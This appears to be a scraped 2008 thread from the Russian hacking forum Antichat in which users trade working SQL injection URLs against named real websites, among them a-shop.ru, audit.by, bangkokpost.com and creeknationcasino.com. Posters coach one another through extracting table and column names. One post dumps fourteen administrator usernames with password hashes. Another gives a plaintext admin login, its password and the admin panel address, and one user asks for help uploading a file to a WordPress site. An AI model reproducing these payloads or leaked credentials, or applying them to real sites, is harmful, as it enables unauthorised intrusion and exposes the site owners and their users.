Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.07.2008, 17:02
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
Спасибо!
|
|
|
10.07.2008, 19:53
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Народ нашел дыру
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,version(),5,6,7,8/*
versia 5.*.*
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.tables+limit+1,1/*
нашел нужные таблицы
KEY_COLUMN_USAGE
neo_groups
client_info
Теперь как узнать что в них? напишите плиз готовый вариант, то сколько по faq не пытался ни хрена не получается
заранее спс
Вот мой вариант
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,column_name,5,6,7,8+from+info rmation.schema.columns+where+table_name=%27client_ info%27/*
Но после этого ни чего не выводит мб я чет не так делаю, хз , жду ващй помощи )
Последний раз редактировалось 2la.painkiller; 10.07.2008 в 20:02..
|
|
|
|
10.07.2008, 19:58
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
вапросы по уязвимостям вроде в другой теме...? 
2la.painkiller
/forprint.php?id=-1+union+select+1,2,3,concat_ws(0x3a,table_name,col umn_name),5,6,7,8+from+infor mation_schema.columns+limit+1,1/*
или
/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.columns+where+table_name='table_name '/*
p.s: 'table_name' попробуй закодировать в hex, char...
Последний раз редактировалось aka PSIH; 10.07.2008 в 20:08..
|
|
|
|
10.07.2008, 20:17
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
А я ради безопасности тут написал
во спс помогли
Где можно побольше узнать об этом concat_ws(0x3a, я чет ваще не понимаю что это и откуда
в hex, char... как это сделать? )
в гугл не посылать )
|
|
|
|
10.07.2008, 20:36
|
|
Познающий
Регистрация: 02.06.2008
Сообщений: 52
Провел на форуме:
218331
Репутация:
10
|
|
Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!
|
|
|
|
10.07.2008, 23:12
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
a-shop.ru
_http://www.a-shop.ru/articles.php?aid=-54'+union+select+1,concat_ws(0x3a,username,passwor d),3,4+from+administrators/*
evgeny:*71363E2E614A09E3EF9BB9AA6E75E63A475A81AD
amira:*E9F326EFC55D3E0D7FAB74C7BD7894AD8DC4B2F1
sveta:*6DDE0543444FBA9E39CAA6D3320908E07BF32C22
bigmike:*AB930C3AE04FC73337AFE016B0A145AEC5005598
mike:*FAA1BD777F877B9E165659BC903AFA947891CA11
alena:*BCA54683246384E4B34497AB508FD62F21017832
nastja:*D3F3A4030CBF35E9F71FDB8B2E7282A29E0F16E7
Sky:*AE889E02E12594B05C080B52FE32E2584B3993D9
ZaitsevS:*E6E49E72EF471AEBFCAE2B7A48E6469A4DBE2B2E
Sergey-S:*72AA3892FA00484D53B77060D55904FFB5F3D573
denis:*7AEF71A0E7DD19051D6B1DBF7549CAE50897703B
roller:*04CD3F2CB5195CE66AE7D5757B54D6DED734485E
Serginio:*2BEE00F76C0D1B93FFF2DE9792977A8F1E371AB7
olesya:*4A4DECD159BEAEB0B1BAE7D7D07CFF5E5E96B664
|
|
|
|
11.07.2008, 05:21
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269
Репутация:
1158
|
|
audit.by
http://www.audit.by/new/index.php?id=1'
http://www.audit.by/new/index.php?id=10&spr=1'
http://www.audit.by/new/?news_id=1'
|
|
|
|
11.07.2008, 05:32
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от procedure
audit.by
http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,version()/*
4 версия =(
----
http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,3+from+news/*
|
|
|
|
11.07.2008, 06:39
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
pr=6
www.bangkokpost.com
Код:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-128097+union+select+1,2,3,4,5,6,name,8,9,email,11,12,13,14,15+from+users--
sify.com
Код:
http://sify.com/sports/football/fullstory.php?id=-14704106+union+select+1122,2222,3333,4444,version(),6666,7777,8888,999,1000,1100,1200,1300,1400,1500,1600,1700,1800--
pr=5
www.panoramablick.com
Код:
http://www.panoramablick.com/service4free.php?kat_id=3364&nav_id=-3364+union+select+1,2,3,4--&lang=en&action=showkat
|
|
|
|
11.07.2008, 09:56
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
www.creeknationcasino.com
SQL inj:
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(managerlogin,char(58),managerpassword)+from+man agers/*
Логин: admin
Пароль: tr!@b
Админка:
http://www.creeknationcasino.com/admin/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
